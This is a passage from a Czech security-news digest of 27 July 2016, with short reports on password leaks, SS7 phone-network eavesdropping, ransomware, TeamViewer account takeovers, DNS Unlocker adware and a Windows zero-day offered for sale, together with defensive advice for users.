Vhodné je mít také platební kartu při transakcích na internetu zabezpečenou pomocí potvrzovacích SMS zpráv. Při každé platbě sice bude nutné opisovat kód ze SMS, ale podvodníkům se tak výrazně ztíží práce. Tuto službu ale všechny banky nenabízejí.


Hackeři budou mít těžší práci. Microsoft zakáže jednoduchá a hloupá hesla

27.7.2016  Zdroj: Novinky/Bezpečnost Zabezpečení
Společnost Microsoft se bude snažit co nejvíce ztížit práci počítačovým pirátům a kyberzločincům. Svým uživatelům proto zakáže používat jednoduchá a hloupá hesla. Proniknout na účet, který je chráněn například postupně jdoucí číselnou řadou, je totiž otázka pár sekund.
Americký softwarový gigant se podle britského deníku The Independent odhodlal poté, co se na černém trhu objevily k prodeji desítky miliónů hesel ze sítě LinkedIn. Jejich analýzou se totiž ukázalo, že s vytvářením hesla si příliš lidí hlavu neláme.

Statisíce lidí používaly k zabezpečení svých účtů jednoduché heslo 123456 nebo nepříliš originální linkedin (název profesní sítě, ze které data unikla) či password, což v překladu znamená jednoduše heslo. 

Jednoduchá hesla jsou hazard
Používat podobná hesla je přitom podle bezpečnostních expertů hazard. „Stejně jako počítačoví piráti analyzujeme přihlašovací údaje, které uniknou na internet. Není žádným tajemstvím, že totéž dělají počítačoví piráti,“ uvedl Alex Weinert ze společnosti Microsoft a hned doplnil: „Zlí hoši pomocí těchto údajů organizují své útoky.“

Řešením je podle něj podobně jednoduchá a hloupá hesla jednoduše zakázat. „Když je uživatelé nebudou moci používat, jen těžko pak podobné úniky ohrozí jejich uživatelské účty,“ doplnil Weinert.

Narážel přitom na to, že podobně jednoduchá hesla používají lidé prakticky na všech webových službách. Je totiž vcelku běžné, že uživatelé zabezpečují stejným heslem různé internetové účty.

Čtyřmístný kód rozlouskne PC za 1,5 minuty
Bezpečnostní experti odolnost takto jednoduchých hesel testovali už dříve. Za pouhých deset hodin se jim na sestavě v hodnotě bezmála tří desítek tisíc korun podařilo s volně dostupnými aplikacemi bez velkých obtíží prolomit 200 tisíc hesel.

Tento test ukázal, že složitější je pro počítačové piráty prolamovat delší hesla. Například čtyřmístný kód složený jen z malých písmen abecedy zvládne průměrná sestava rozlousknout za 1,5 minuty. Na osmimístné heslo však již potřebuje 2,5 hodiny. 

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.

Kdy přesně Microsoft jednoduchá a hloupá hesla zakáže, zatím není jasné. Otazník také visí nad tím, zda se to bude týkat pouze jeho e-mailové služby, nebo i dalších služeb.


Teroristé se na internetu pohybují stejně obezřetně jako kyberzločinci

27.7.2016  Zdroj: Novinky/Bezpečnost Hrozby
Teroristé používají na internetu podobné techniky a metody jako počítačoví piráti. Například sdílejí stejné komunikační kanály, aby si zajistili anonymitu. Vyplývá to z analýzy kyberkriminality antivirové společnosti Trend Micro.
„Online přítomnost teroristických organizací a kyberzločinců se v mnohých bodech překrývá. Obě skupiny komunikují prostřednictvím stejných kanálů a používají stejné technologie, což ve výsledku značně komplikuje možnosti jejich sledování,“ uvedl Václav Petrželka, regionální manažer společnosti Trend Micro.

Podle něj patří mezi nejvyužívanější komunikační kanály tzv. deep web. To jsou internetové stránky a databáze, které nejsou přístupné z klasických internetových prohlížečů a vyhledávačů. K jejich zobrazení je potřeba používat systém Tor, respektive Tor Browser.

Anonymita zajištěna
Jeho použitím si hackeři, a potažmo také teroristé, zajistí anonymitu a zároveň získají přístup ke skrytým serverům v doméně onion, ke kterým se z „běžného“ internetu uživatelé nedostanou. Na nich se běžně obchoduje například se zbraněmi nebo s chybami v operačních systémech a dalšími programy, na které zatím bezpečnostní experti ještě neupozornili.

Nabízí se otázka, proč nejsou skryté servery na internetu blokovány. Jsou totiž důležité a užitečné například pro občany v nedemokratických režimech, kterým umožňují anonymně komunikovat a vyjadřovat na internetu své názory bez obav z postihu.

Jak se dá patrně tušit, deep web využívají teroristé jednak k nákupu zbraní, jednak k propagandě. „Zatímco hlavním cílem kyberzločinců je především krádež finančních prostředků v elektronickém prostředí a udržení si anonymity, teroristé se snaží hlavně o to, aby se jejich odkaz rozšířil mezi co možná nejširší publikum v naději na získání potenciálních sympatizantů,“ doplnil Petrželka.

Šifrovaná komunikace
Pro komunikaci mezi sebou totiž teroristé zpravidla tyto ukryté weby nevyužívají. K dispozici mají totiž daleko sofistikovanější řešení – například vlastní aplikaci pro šifrovanou komunikaci, jak se ukázalo na začátku roku. 

Tu využívá například Islámský stát, díky čemuž bezpečnostním složkám z různých koutů světa prakticky znemožňuje určovat jejich další cíle.

Aplikace zvaná Alrawi jasně ukazuje, jak mocným nástrojem může být v rukou teroristů obyčejný chytrý telefon. Nemusí jít přitom ani o žádný speciální model s vojenskou certifikací a zabezpečením, ale klidně jen o levný smartphone za pár stovek s operačním systémem Android.

Aplikaci střeží jako Enigmu
Právě na této platformě totiž chatovací aplikace Alrawi běží. Jak upozornil server Tech Crunch, aplikace nemůže být stažena z oficiálního obchodu Google Play, Islámský stát ji distribuuje mezi své bojovníky sám. A ti ji střeží podobně jako dříve nacisté šifrovací stroj Enigmu.

Program funguje velmi podobně jako jiné šifrovací nástroje. V chytrém telefonu se komunikace zakóduje pomocí speciálního klíče a teprve poté putuje přes internet nebo sítě mobilních operátorů k příjemci – v tomto případě jinému bojovníkovi Islámského státu.

Díky tomu, že je v aplikaci příjemce příslušný klíč, je ji možné opět snadno rozšifrovat. Pokud by tedy zprávu zachytili bezpečnostní experti stojící na druhé straně barikády, jen těžko by byli schopni bez příslušného klíče získat její obsah.


Na banky v Asii možná útočili hackeři z KLDR

27.7.2016 droj: Novinky/Bezpečnost Hacking
Americká společnost pro kybernetickou bezpečnost Symantec přišla s hypotézou, že za nedávnými útoky na banky v Asii může stát Severní Korea. Pokud by se to potvrdilo, byl by to první případ, kdy stát krade takto peníze z účtů, uvedla BBC.
Podle Symanteku, který vyrábí antivirové programy, byl při útocích použit relativně neobvyklý malware podobný tomu, který použili hackeři při útoku na hollywoodské filmové studio Sony Pictures v roce 2014. Americká vláda tehdy uvedla, že za hackerským útokem na Sony stála Severní Korea.

Technický ředitel společnosti Symantec Eric Chien podle agentury Reuters řekl, že pokud se ukáže, že za hackerskými útoky na banky stála KLDR, byl by to první známý případ krádeže peněz ze strany státu prostřednictvím kybernetického útoku.

Symantec má důkazy, že peníze z banky na Filipínách, z peněžního domu ve Vietnamu a z bangladéšské centrální banky se pokusila ukrást stejná skupina lidí.

Hackeři letos v únoru ukradli 81 miliónů dolarů (téměř dvě miliardy Kč) z účtu bangladéšské centrální banky vedeného u Federální rezervní banky (Fed) v New Yorku. Podle zástupců společnosti Symantec šlo o stejnou skupinu, která se pokusila ukrást milión dolarů z banky Tien Phong Bank ve Vietnamu a která zaútočila na banku na Filipínách. Její název Symantec ve čtvrtečním sdělení neuvedl. Útoky je podle něj možné vystopovat do října loňského roku.

Viceguvernér filipínské centrální banky řekl, že při kybernetických útocích žádná banka v zemi o peníze nepřišla.


Další úspěšný útok pomocí ransomware: univerzita v Calgary zaplatila výkupné 20 tisíc dolarů
27.7.2016
Zdroj: Živě
Viry
Pokud se útočníkům využívající tzv. ransomware podaří infikovat počítače některé z institucí nebo firemní stroje, mají velkou šanci, že požadované výkupné obdrží. V tomto typu útoků za něj oběť obdrží dešifrovací klíč, který se postará o odemknutí nedostupných dat. V případě napadení soukromých počítačů se pravděpodobně většina uživatelů svých dat vzdá a statisíce nebude útočníkům posílat. Mimo jiné z toho důvodu, že funkčnost klíče není zaručena. V případě posledního případu z kanadského Calgary však byli útočníci „féroví“.

Tohle okno na svém počítači vidět nechcete - útočníci skrz něj žádají výkupné, za které pošlou dešifrovací klíč

University of Calgary oznámila zaplacení výkupného ve výši 20 000 kanadských dolarů (asi 374 tisíc korun) na účet neznámých útočníků, kterým se podařilo zašifrovat data na několika počítačích v univerzitní síti. Ty patřily personálu i profesorům a kromě jiného se útok postaral o nedostupnost e-mailu.

K napadení došlo minulé úterý a po týdnu se vedení rozhodlo o vyplacení požadované částky, pravděpodobně pomocí bitcoinů. Klíč, který následně útočníci odeslali, byl funkční a mohlo tím pádem dojít k obnovení dat a také funkčnosti e-mailu.


Stačí telefonní číslo a hacker vás bude odposlouchávat lépe než NSA
27.7.2016
Zdroj: Živě
Mobilní
Telefonní sítě jsou postavené na děravém systému SS7
Stačí znát číslo oběti a na černém trhu získat přístup
Útočník může poslouchat hovory, číst cizí SMS a prolomit WhatsApp
Stačí telefonní číslo a hacker vás bude odposlouchávat lépe než NSA
Snad žádný Jobsův životopis neopomene zmínit blue box Steva Wozniaka, pomocí kterého v mládí zdarma telefonovali do Vatikánu a vydávali se za Henryho Kissingera. Modrá krabička nebyla ničím jiným než generátorem speciálních servisních tónů. Stačilo si v dokumentaci přečíst, kolik Hz má mít sada signálů, které umožní transatlantický neplacený hovor, a bylo to.

Ovládnutí tzv. phreakingu bylo základní dovedností každého amerického hackera 70. a 80. let, a než došlo k proměně a digitalizaci technologií, bavila se podobnými hovory celá jedna generace mladíků nejen v USA.

Chcete odposlouchávat něčí telefon? Nastudujte si SS7

Leckoho by napadlo, že v dnešní době už něco podobného není možné a hacking mobilních sítí se odehrává leda v divokých scénářích hollywoodských blockbusterů, ve kterých hacker naťuká pár magických čísel do telefonu a začne odposlouchávat třeba amerického kongresmana, ovšem ono to skutečně jde.

Chcete odposlouchávat něčí telefon? Chcete si číst cizí SMS? Chcete sledovat polohu nadřízeného? Chcete telefonovat zdarma? Specialisté z Positive Technologies již před lety demonstrovali (PDF), že toto je i dnes naprosto možné a jediné, co k tomu potřebujete, je telefonní číslo oběti a přístup do systému SS7 (podrobněji v PDF).

Signaling System 7 je rodina signalizačních protokolů, kterými se řídí prakticky všechny děje v telefonní síti počínaje otevíráním telefonních spojení a konče zasíláním SMS. SS7 dnes používají prakticky všichni operátoři na celém světě, s pomocí SS7 tedy dorazí SMS z dovolené v Chorvatsku až do Prahy a stejně tak se dovoláte třeba do Grónska.

SS7 je lety ověřený systém, jeho základy totiž sahají hluboko do minulosti analogové telefonie. Stejně tak se ale ví, že je to nehorázně děravý systém. O mnoha z jeho zranitelností se už ví prakticky od počátku 21. století a aliance GSMA propojující operátory a výrobce jen opakuje, že sice plánuje jeho vylepšení, nicméně se to protáhne až do příštího desetiletí. Není se čemu divit, změna protokolů, na kterých stojí a padá současná mobilní telefonie realizovaná stovkami a tisíci operátorů je totiž enormně složitá.

Znali jen telefonní číslo, a přesto hackli kongresmanův iPhone

Děravé telefonní protokoly byly dlouhé roky výhradně tématem odborných konferencí, než se však letos na jaře v pořadu 60 Minutes na CBS (pouze pro předplatitele) objevila reportáž, ve které hackeři z Positive Technologies úspěšně zaútočili na iPhone kongresmana Teda Lieua, aniž by jej kdykoliv dostali do rukou. Stačilo jim pouze kongresmanovo číslo.

681348475
Kongresman Ted Lieu se nechal v pořadu 60 Minutes dobrovolně napadnout hackery, sám je totiž členem parlamentní komise pro informační technologie.

Specialisté totiž měli zadní vrátka do systému SS7, která jim umožnila provést s mobilní konektivitou telefonu prakticky cokoliv počínaje odposlechem a monitorováním jeho polohy a konče jammingem – blokací. Telefon měl stále signál, ale kongresman si nezatelefonoval a nepřijal jediný hovor, protože hackeři vyslali do sítě signál, aby se klient nemohl spojit.

Aliance GSMA nebije na poplach mimo jiné z toho důvodu, že k podobnému útoku sice člověk nepotřebuje žádné sofistikované zařízení a celý systém SS7 je plně dokumentovaný, potřebuje však patřičná práva. SS7 není pro každého, ale pouze pro autorizované entity – operátory. Problém spočívá v tom, že k němu může mít přístup kdejaký technik, který může být motivovaný třeba finanční odměnou, anebo mohou hackeři získat přístup do signalizační sítě č. 7 na černém trhu.

Odposlech polohy podle telefonního čísla

Suma sumárum, provést takový útok není tak snadné, jako když script kiddie spustí na Linuxu aircrack a odpojí souseda od Wi-Fi, jenže stejně tak nemusíte být NSA. Hlavním rizikem je tedy především zneužití ze strany organizovaného zločinu, který má dostatečné finanční prostředky.

Útok skrze SS7, jak jej demonstrovala skupina Positive Technologies, se skládá z několika úrovní. Pokud útočník na počátku zná pouze telefonní číslo, v první vlně se systému pomocí protokolu SMS zeptá, jaký má oběť IMSI – International Mobile Subscriber Indentity.

644485946
Útočník skrze SS7 získal podle telefonního čísla oběti její IMSI a další identifikátory potřebné pro další útoky (Celý proces je vysvětlený v tomto PDF)

Jakmile jej útočník získá, může do mobilní sítě vyslat další dotaz a odpovědí mu už budou lokalizační údaje oběti, tedy především CID – identifikátor BTS, u kterého je telefon právě registrovaný. Pak již stačí použít některou z databází (třeba Wigle) a podívat se, kde se daný vysílač nachází.

147113901603324994
Pomocí IMSI oběti může útočník v dalším kroku získat údaje o BTS vysílači, ke kterému je právě připojený, a tedy i zeměpisnou polohu

Pokud by tento proces hacker automatizoval a požadavek na lokalitu oběti by se zasílal třeba každou čtvrthodinu, může útočník oběť průběžně monitorovat a jen sledovat pohybující se puntík na mapě. A to aniž by nešťastník cokoliv zjistil, jakmile má totiž záškodník vstup do systému SS7, zasílá do něj zcela legitimní dotazy. Právě možnost zasílání těchto neautorizovaných dotazů je obrovskou slabinou celého systému.

67337732037035356
Schéma odposlechu hovoru a SMS. To všechno SS7 umožňuje.

Odposlech, přesměrování SMS aj. je pak už jen otázkou další sady příkazů. A jen zopakuji, že toto vše je možné a zdokumentované již dlouhé roky a nejedná se o žádnou novinku několika posledních měsíců. Problém tedy spočívá v tom, že signalizační příkazy SS7 může zasílat každý člen sítě a vstup do sítě podle Positive Technologies není pro organizovaný zločin teoreticky nikterak složitý – třeba skrze některou z afrických zemí s chabou telekomunikační legislativou. Jak velkou překážkou to pak musí být pro NSA a podobné agentury?

Pomocí SS7 lze zaútočit i na WhatsApp, Telegram a další mobilní IM

Posuňme se nyní o pár týdnů dál. Počátkem dubna WhatsApp s velkou pompou oznámil, že již umožňuje plně šifrovanou komunikaci end-to-end. To v praxi znamená, že se chat šifruje v jednom telefonu a dešifruje v druhém, aniž by provozovatel služby vlastnil klíč. Nemůže tedy takovou komunikaci dešifrovat a to ani v případě, že by jej o to požádal třeba soud, FBI, NSA a další autority.

Nadšení z dokonale zabezpečeného WhatsAppu však vydrželo jen pár týdnů, počátkem května se totiž znovu ozvali specialisté z Positive Technologies a konstatovali (obšírněji na Forbesu), že veškeré šifrování WhatsAppu obešli opět skrze signalizační systém SS7. A nejen WhatsAppu, ale i dalšího mobilního kecátka Telegram.

800909385
Schéma útoku skrze SS7: Útočník na sebe nejprve pomocí SS7 přesměruje autorizační SMS IM služby a pomocí ní se pak přihlásí třeba k Telegramu

Jelikož autorizace podobných aplikací probíhá pomocí telefonního čísla a případně SMS s autentizačním kódem, stačilo přesměrovat SMS oběti na záškodnický telefon a po příchodu SMS s kódem se připojit třeba do jeho Telegramu. Pokud by si pak dvě osoby psaly z mobilu na mobil, veškerý chat by se zrcadlil i na telefonu útočníka. Telegramu to nepřipadne divné, protože jeden uživatel může mít samozřejmě vícero připojených zařízení.

Problém by sice nastal u probíhajícího šifrovaného chatu, protože před jeho započetím si aplikace na obou stranách vyměnily šifrovací klíče a záškodník u toho nebyl, nicméně pokud sám započne chat, může se vydávat za oběť a už si šifrovaně povídat s třetí osobou a tahat z ní rozumy. Třeba: „Ahoj Davide, zapomněl jsem heslo na redakční Twitter. Pošli mi ho pls Jakub.“

Útok na WhatsApp

Útok na telegram

Jak vidno, děravý není jen počítač a operační systém, na kterém zrovna čtete tento článek, ale i systémy mobilních sítí, o kterých se zase tak často nepíše a surfaři tak nějak přirozeně předpokládají, že do podobné infrastruktury se jen tak někdo nedostane.

A skutečně nedostane – vstup do SS7 bude pro běžného hackera-zelenáče nejspíše příliš velké sousto, a ze strany nudícího se kolegy v práci vám tak nebezpečí nejspíše nehrozí. Jinak tomu ale může být u organizovaného zločinu a obecně třebas finančně motivovaných hackerů, kteří získají přístup třeba na černém trhu a mohou pomocí SS7 provádět průmyslovou špionáž. Doufejte tedy v to, že jste pro ně dostatečně nezajímaví. A také v to, že operátoři po celém světě co nejdříve sjednají nápravu a omezí SS7 pouze pro legitimní použití.


IT firmy varují před novým šmírovacím zákonem, který prosazuje FBI
27.7.2016
 Zdroj: Živě
Zákony
Situace kolem soukromí uživatelů je v posledních letech ostře monitorována. Navíc nedávný spor společnosti Apple s FBI prokázal, že velké IT firmy stojí ve většině případů na straně soukromí svých zákazníků, než vlády. I teď tak upozorňují na nebezpečný zákon, který se vládní agentura snaží prosadit, informuje Engadget.

Jedná se o zákon, umožňující v případě hrozby teroristického útoku nebo špionáže bez povolení získat přístup k záznamům elektronické komunikace (ECTR – electronic communication transactional records).

Stížnost na úpravu zákona, která by rozšířila pravomoce dopisu NSL, si můžete přečíst zde

FBI by poté mohlo získat přístup k záznamům obsahují informace o tom, na jakých serverech a jak dlouho dotyčný strávil nebo s kým a kdy si psal. Tzv. ECTR ale nezahrnuje obsah elektronické pošty, hledané fráze na internetu nebo obsah formulářů. K získaní ECTR by podle navrhované změny zákona mělo postačit, aby zvláštní agent ve vedení místní pobočky FBI napsal tzv. NSL (national security letter), který nevyžaduje schválení soudcem. Upráva by se tak týkala rozšíření pravomocí tohoto dopisu.

Proti této změně se ohradila "koalice ECTR", která zahrnuje významné společnosti v IT průmyslu jako například Facebook, Foursquare, Google nebo Yahoo. Koalice sepsala dopis, který na zákon upozorňuje a varuje před ním. Nelíbí se jim rozšiřování pravomocí FBI a jakým způsobem je NSL zneužíván.


Protipirátská organizace to vyřešila: jako warez nahlásila Apple, Google i Netflix
27.7.2016
Zdroj: Živě
Zákony
Vlastnící autorských práv nebo jejich zástupci mají jednoduchou možnost, jak odstranit weby z výsledků vyhledávání Googlu. Pokud web opravdu nelegálně šíří autorský obsah, pak jej lze nahlásit a Google stránky nebude zobrazovat. Mezi novými organizacemi se během uplynulého týdne objevila exotická skupina Copyright UNIVERSAL, která si s nahlašováním velkou hlavu nedělá. Mezi weby, které se jí znelíbily, patří také iTunes od Applu, Google Play Store, Netflix, Hulu a dokonce i některé oficiální weby filmů. Na kuriozitu upozornil TorrentFreak.

copyright.jpg
Adresy, které podle Copyright UNIVERSAL šířily filmy nelegálně (zdroj: TorrentFreak)

Organizace Copyright UNIVERSAL nahlásila celkem 5 224 adres, které podle ní šířily nelegální obsah, a měly z výsledků vyhledávání zmizet. Vtipné je, že se mezi ně dostala i stránka mpaa.org, tedy oficiální web jedné z nejznámějších protipirátských organizací.

Výčet děl, které měly být Netflixem nelegálně šířeny obsahuje seriál Love, Apple měl v rámci warezu nabízet třeba film Nedotknutelní a Google se provinil šířením snímku 13 hodin: Tajní vojáci z Benghází na Play Store. Není proto divu, že tento, ani jiný nesmyslně nahlášený web nebyl z vyhledávání odstraněn. Podle TorrentFreaku také není jasné, kdo za organizací stojí – jisté je pouze to, že komunikuje z Indie.


Útočníci mohli upravovat obsah zpráv na Facebooku. Dodatečně měnili odkazy nebo dohody
27.7.2016  Z
droj: Živě
Sociální sítě
Bezpečnostní skupina Check Point zveřejnila informace o chybě, která mohla v uplynulých měsících způsobit mnohé problémy. V rámci Facebook Messengeru se objevila zranitelnost umožňující zpětně měnit obsah zpráv nebo je také celé smazat.

Útočníkům stačilo odposlechnout komunikaci prostřednictvím proxy serveru a získat tímto způsobem ID zprávy. Následně mohl měnit její parametry nebo ji zcela smazat a to bez toho, aniž by příjemce byl upozorněn notifikací.


Díky této chybě mohlo docházet k podvodům, kdy útočník mění předem stanovené podmínky, což se týká například komunikace s firemními účty, kam se velká část konverzace se zákazníky přesunula. Další možností bylo také měnění již doručených zpráv za odkazy na nebezpečné soubory. Ve videu se jednalo o distribuci ransomware.

Check Point nahlásil chybu na začátku měsíce a nyní je již Facebookem opravena.


ESET objevil chybu v systému Windows, která komplikuje ochranu před DNS útoky

27.7.2016 Zdroj: Eset Zranitelnosti

Analytici společnosti ESET detekovali novou verzi adware DNS Unlocker s unikátní schopností měnit výchozí konfiguraci DNS. Typickým příkladem, jak DNS Unlocker ovlivňuje napadený počítač, je zobrazování reklam, které jako zdroj uvádí DNS Unlocker, a několika variantami podvodných stránek upozorňujících na údajnou nákazu počítače.

„DNS útoky nejsou tak destruktivní – řekněme v porovnání s ransomware – a bývalo vždy jednoduché je eliminovat. U nové varianty DNS Unlocker to však už neplatí,“ říká Petr Šnajdr, bezpečnostní expert společnosti ESET.

Analytici společnosti ESET zjistili, že nový typ DNS Unlocker dokáže oklamat operační systém Windows tak, aby zobrazoval jiné hodnoty nastavení DNS, než je tomu ve skutečnosti. „V grafickém rozhraní se nadále zobrazuje, že používáte automaticky přiřazenou adresu DNS serveru, ale ve skutečnosti používáte adresu statickou. Stručně řečeno, jedná se o DNS útok, který si vynutí používání podvržených serverů DNS. Proto jde o problém, který je pro běžného uživatele velmi těžko řešitelný,“ konstatuje Petr Šnajdr.

Odborníci ze společnosti ESET analyzovali tento podvod a zjistili, že základní problém je v tom, jak systém Windows pracuje s DNS adresami. Podrobné informace o svých zjištěních proto zaslali společnosti Microsoft. Její bezpečnostní divize Microsoft Security Response Center (MSRC) uznala, že jde chybu, ale bohužel ji neklasifikovala jako potenciální zranitelnost. „Jelikož úprava registru vyžaduje administrátorská práva, nepovažujeme tento problém za natolik nebezpečný, abychom ho řešili prostřednictvím servisu MSRC,“ odpověděli zástupci divize.

„Doufejme, že Microsoft bude tento problém řešit v budoucích verzích operačního systému Windows. Do té doby by si měli být uživatelé vědomi rizika DNS útoků,“ říká Marc-Etienne Leveille, výzkumník malware ve společnosti ESET, který se podílel na odhalení této bezpečnostní chyby.

Experti společnosti ESET zároveň zveřejnili řadu preventivních opatření:

Nenechávejte uživatele s administrátorskými právy surfovat na internetu; pokud ano, pak pouze v nezbytných případech.
Pokud zaregistrujete nevyžádané reklamy, zejména v případě, pokud mají dole v patičce uveden původ DNS Unlocker, zkontrolujte si nastavení DNS serverů v pokročilém menu nastavení TCP/IP.
Pokud spatříte pop-up okno s nabídkou nějakého druhu podpory, buďte extrémně opatrní a před jakýmkoli dalším krokem si zkontrolujte nastavení DNS.
Pokud máte jakékoli pochybnosti o nastavení DNS, můžete odstranit podezřelé položky na kartě DNS na stránce pokročilých nastavení TCP/IP. Kontrolou počítače pomocí ESET Online Scanner odstraníte malware DNS Unlocker a zastavíte manipulaci s nastavením DNS.
Dodržujte všechna základní pravidla pro bezpečné používání internetu, včetně toho, abyste používali kvalitní bezpečnostní řešení.


Mark Zuckerberg používal stejné heslo na více službách. Krátce přišel o Twitter a Pinterest
27.7.2016
Zdroj: Živě
Hacking
Každý to ví a IT specialisté to opakují stále dokola: Používejte na internetu vícero hesel. Jenže jak už tomu bývá, i skutečně schopný ajťák se občas stane obětí dětinské chyby. Aktuálně se to stalo jednomu z těch nejznámějších – Marku Zuckerbergovi.

Surfař s přezdívkou OurMine krátce získal přístup k jeho účtu na Twitteru a Pinterestu s tím, že prý heslo získal ze čtyři roky starého úniku dat na Linkedinu. Zdá se tedy, že Zuckerberg na všech těchto službách používal stejné heslo. Na stranu druhou, Marka tento útok prakticky příliš nezasáhl, protože Twitter a Pinterest téměř nepoužívá.

Útočník údajně pronikl i do Markova účtu na Instagramu ,což však služba odmítla s tím, že žádný účet z ekosystému Facebooku nebyl napaden.

A jak jste na tom vy? Používáte stejné heslo k více službám na webu? Podělte se v diskuzi pod článkem.


Nový týden, nový hack: na prodej je 100 milionů účtů z VKontakte. Hesla jsou v plain textu
27.7.2016
 Zdroj: Živě
Hacking
Web Motherboard přišel se zprávou o dalším velkém úniku hesel, kterých v posledních dnech značně přibylo. Tentokrát jde o ruskou sociální síť, která na tamním trhu úspěšně konkuruje Facebooku – Vkontakte, či zkráceně VK.com.

V rámci jednoho z černých tržišť v síti Tor se objevila nabídka na prodej sta milionů hesel k účtům na síti, kterou založil Pavel Durov. Vzorek účtů si vyžádaly weby LeakedSource a Motherboard, podle nichž jde o korektní údaje. Prý pochází z let 2011-2013 a nabízená hesla jsou v holém textu bez jakéhokoliv šifrování. Kromě jmen, e-mailů a hesel obsahují údaje také telefonní čísla uživatelů.

Na LeakedSource se také objevila analýza nejčastějších hesel z VK.com:

123456
12456789
qwerty
111111
1234567890
1234567
12345678
123321
000000
123123


TeamViewer konečně reaguje: zavádí přísnější ochranu přístupu
27.7.2016
 Zdroj: Živě
Zranitelnosti
Série útoků na počítače s TeamViewerem se konečně dostává z fáze obviňování, kdo za co může, ke zveřejňování konkrétních řešení.

Není jisté, jestli hacky stále pokračují, ani specifický způsob útoku. Už by ale neměly tolik škodit. PayPal nyní už velmi dobře ví o útocích a bez větších problémů vrací peníze na vytunelované účty. Stačí spolu s žádostí poslat logy TeamVieweru a historii navštívených stránek v čas připojení. Podobně reagují i Microsoft, Amazon a eBay.

Bezpečnost
Používáte Teamviewer? Mnoho uživatelů hlásí úspěšný hack počítače

Konečně se rozhoupal i TeamViewer. Jen úplně neustoupil od rétoriky obviňování uživatelů z používání stejných hesel na více službách, i když řada uživatelů měla unikátní kvalitní heslo. Především ale nyní zavedl větší ochranu.

Už bude monitorovat nestandardní přihlašování a pokud bude něco podezřelé, vyžádá si změnu hesla. Další ochrana by pak měla pomoci i pokud chyba spočívá v úplném obejití hesla. Na počítači, na kterém se poprvé přihlásíte ke svému účtu, budete muset dodatečně potvrdit autorizaci e-mailem, který vám dojde na vaši adresu. Útočníci se přihlašovali z Číny nebo Jižní Koreje a až podezřele snadno procházeli autentizačním procesem. Nově zavedené ochrany by to měly znemožnit.

To ale nemění nic na tom, že reputace TeamVieweru dostala těžkou ránu. Lidé jej houfně odinstalovávají a hledají vhodné alternativy. Zřejmě i tento velký exodus uživatelů přiměl TeamViewer k rychlé reakci. Teď ještě zjistit, kde se opravdu stala chyba.


Používáte Teamviewer? Mnoho uživatelů hlásí úspěšný hack počítače
27.7.2016
 Zdroj: Živě
Zranitelnosti
Důvěra v Teamviewer se otřásá v základech. V uplynulých dnech začalo velké množství uživatelů hlásit průnik do jejich počítačů přes Teamviewer. Útočníci vysáli peníze z PayPalu a nakoupili dárkové poukazy na Amazonu.

Postižení uživatelé přitom často měli unikátní silné heslo pro Teamviewer a někteří hlásí úspěšný průnik i přes použití dvoufaktorového ověřování. Útočníky zastavuje případný přihlašovací dialog k systému.

673067295

Příběhy uživatelů se plní kanál na Redditu a často jde o hororové příběhy. Tisíce vysátých dolarů z PayPalu nebo elektronické nákupy na Amazonu, které nepotřebují doručení na adresu. I když nejste přihlášeni k PayPalu, do pošty se útočníci často dostanou a mohou si vyžádat změnu hesla.

Samotná firma Teamviewer GmbH nereaguje úplně přesvědčivě. Vydala tiskové prohlášení s datem z minulého týdne, byť reaguje na aktuální události, ve kterém se zříká jakýchkoli pochyb a veškerou vinu hází na uživatele a jejich slabá hesla. Stejně tak několik hodin nefungovaly servery Teamvieweru, což údajně s aktuální kauzou nesouviselo. Pochyby budí především plošné odmítnutí veškeré zodpovědnosti a poukazování na slabá hesla, když jsou postižení i lidé s dobrým zabezpečením.

Zkontrolujte si v logu TeamVieweru (C:\Program Files (x86)\TeamViewer soubor s příponou .LOG), zda tam nemáte vzdálené přístupy "Starting desktop process" v nezvyklých časech. Počítače s běžícím TeamViewerem také zamykejte, aby tam byla dodatečná ochrana.


Hacker prodává software, kterým ovládnete Windows 10
27.7.2016
 Zdroj: Živě
Hacking
Bezpečnostní experti našli na hackerském fóru nabídku na prodej aplikace, která údajně využívá takzvanou „zero day“ zranitelnost v operačním systému Microsoftu. Chyba je prý tak vážná, že ohrožuje všechny počítače se současnými verzemi Windows. Informace o hrozbě zveřejnila společnost Trustwave na svém blogu.

Člen undergroundového fóra s přezdívkou "BuggiCorp" prodává za 90 tisíc amerických dolarů (přes 2 miliony korun) exploit, který využívá dosud neodhalenou zranitelnost v ovladači Win32k.sys. Získat ho ale může pouze jediný zájemce.

Všechny novější verze Windows

Hrozba se údajně týká všech verzí operačního systému Microsoft Windows od verze 2000, přes serverové edice až po současnou, řádně aktualizovanou desítku. Irelevantní je i typ použité architektury - x86, respektive x64. Potenciálně může být ohroženo více než 1,5 miliardy všech zařízení využívajících Windows.

306782919
Rusky psaný inzerát nabízí software, kterým lze ovládnout Windows

Základní vlastností škodlivého kódu je zvýšení oprávnění pro spouštěný proces, přičemž nezáleží, zda právě přihlášena osoba má práva jako "host" nebo "standardní uživatel". S nejvyšším oprávněním je možné bez povšimnutí nainstalovat například i libovolný malware. Následně by mohli počítačoví zločinci vykonávat jakoukoli škodlivou činnost jako například získat přístup k dalším počítačům v síti, měnit nastavení systému, krást citlivé soubory a podobně.

Exploit je nabízen ve dvou verzích. První umožňuje jednoduché zvýšení oprávnění na "System" pro libovolný proces. Druhá verze je komplikovanější, ale jakýkoliv škodlivý kód lze spustit v oblasti Ring0, tedy na úrovni jádra systému.

Po zaplacení požadované částky v bitcoinech dostane kupující zdrojový kód a funkční prototyp útočného softwaru, detailní popis zranitelnosti či možnost konzultací ohledně využití chyby.

Video jako důkaz funkčnosti

Pro zvýšení důvěryhodnosti zveřejnil hacker BuggiCorp i dvojici ukázkových videí. V prvním videu figuruje Windows 10, přičemž hacker ještě stahuje poslední dostupné aktualizace systému. Na této platformě následně ukazuje funkčnost exploitu zvýšením oprávnění pro proces "cmd.exe" na úroveň "System".


Druhé video demonstruje, že útočný software úspěšně obchází všechny bezpečnostní mechanismy funkce Enhanced Experience Toolkit (EMET). EMET je součástí moderních operačních systémů z dílny Microsoftu, který využívá různé doplňkové techniky ke zmírnění případného rizika.


Navzdory ukázkovým videím, neexistuje žádný způsob jak reálné ověřit funkčnost exploitu. Každopádně může jít o velmi vážnou hrozbu s velkým dosahem. Anebo také o podvod.


Nová vlna phishingu míří na uživatele Paypalu, předstírá vyšší zabezpečení účtu
27.7.2016
